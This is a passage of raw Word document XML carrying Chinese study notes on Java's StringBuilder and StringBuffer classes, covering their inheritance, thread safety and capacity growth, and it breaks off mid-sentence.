                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>extends</w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:b/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>AbstractStringBuilder</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F405BD" w:rsidRPr="0053559D" w:rsidRDefault="00F405BD" w:rsidP="00F405BD">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="209" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>implements</w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>java.io.Serializable, CharSequence</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F405BD" w:rsidRPr="0053559D" w:rsidRDefault="00F405BD" w:rsidP="00F405BD">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="209" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F405BD" w:rsidRPr="0053559D" w:rsidRDefault="00F405BD" w:rsidP="007B238C">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="209" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>final</w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>class</w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>StringBuilder</w:t>
            </w:r>
            <w:r w:rsidR="007B238C" w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>extends</w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>AbstractStringBuilder</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F405BD" w:rsidRPr="00F405BD" w:rsidRDefault="00F405BD" w:rsidP="00F405BD">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="209" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>implements</w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>java.io.Serializable, CharSequence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F405BD" w:rsidRDefault="00F405BD" w:rsidP="00F405BD">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F405BD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>可以看到，两个类的继承关系是一模一样的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F405BD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Serializable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F405BD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是可以序列化的标志。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F405BD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CharSequence</w:t>
      </w:r>
      <w:r w:rsidRPr="00F405BD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>接口包含了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F405BD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>charAt()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F405BD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F405BD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">length() </w:t>
      </w:r>
      <w:r w:rsidRPr="00F405BD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F405BD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>subSequence()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F405BD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F405BD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>toString()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F405BD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>这几个方法，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F405BD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00F405BD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>类也实现了这个接口。这里的重点是抽象类</w:t>
      </w:r>
      <w:r w:rsidRPr="00F405BD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>AbstractStringBuilder</w:t>
      </w:r>
      <w:r w:rsidRPr="00F405BD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，这个类封装了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F405BD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>StringBuilder</w:t>
      </w:r>
      <w:r w:rsidRPr="00F405BD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F405BD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:r w:rsidRPr="00F405BD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>大部分操作的实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006447A4" w:rsidRPr="006447A4" w:rsidRDefault="006447A4" w:rsidP="006447A4">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="340" w:lineRule="atLeast"/>
        <w:ind w:left="340"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006447A4">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>StringBuilder</w:t>
      </w:r>
      <w:r w:rsidRPr="006447A4">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="006447A4">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:r w:rsidRPr="006447A4">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>都是可变字符串，前者线程不安全，后者线程安全。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006447A4" w:rsidRPr="006447A4" w:rsidRDefault="006447A4" w:rsidP="006447A4">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="340" w:lineRule="atLeast"/>
        <w:ind w:left="340"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006447A4">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>StringBuilder</w:t>
      </w:r>
      <w:r w:rsidRPr="006447A4">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="006447A4">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:r w:rsidRPr="006447A4">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>的大部分方法均调用父类</w:t>
      </w:r>
      <w:r w:rsidRPr="006447A4">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>AbstractStringBuilder</w:t>
      </w:r>
      <w:r w:rsidRPr="006447A4">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>的实现。其扩容机制首先是把容量变为原来容量的</w:t>
      </w:r>
      <w:r w:rsidRPr="006447A4">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="006447A4">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>倍加</w:t>
      </w:r>
      <w:r w:rsidRPr="006447A4">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="006447A4">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>。最大容量是</w:t>
      </w:r>
      <w:r w:rsidRPr="006447A4">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Integer.MAX_VALUE</w:t>
      </w:r>
      <w:r w:rsidRPr="006447A4">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>，也就是</w:t>
      </w:r>
      <w:r w:rsidRPr="006447A4">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0x7fffffff</w:t>
      </w:r>
      <w:r w:rsidRPr="006447A4">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006447A4" w:rsidRPr="009E69F0" w:rsidRDefault="006447A4" w:rsidP="006447A4">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="340" w:lineRule="atLeast"/>
        <w:ind w:left="340"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E69F0">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>StringBuilder</w:t>
      </w:r>
      <w:r w:rsidRPr="009E69F0">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="009E69F0">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:r w:rsidRPr="009E69F0">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>的默认容量都是</w:t>
      </w:r>
      <w:r w:rsidRPr="009E69F0">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
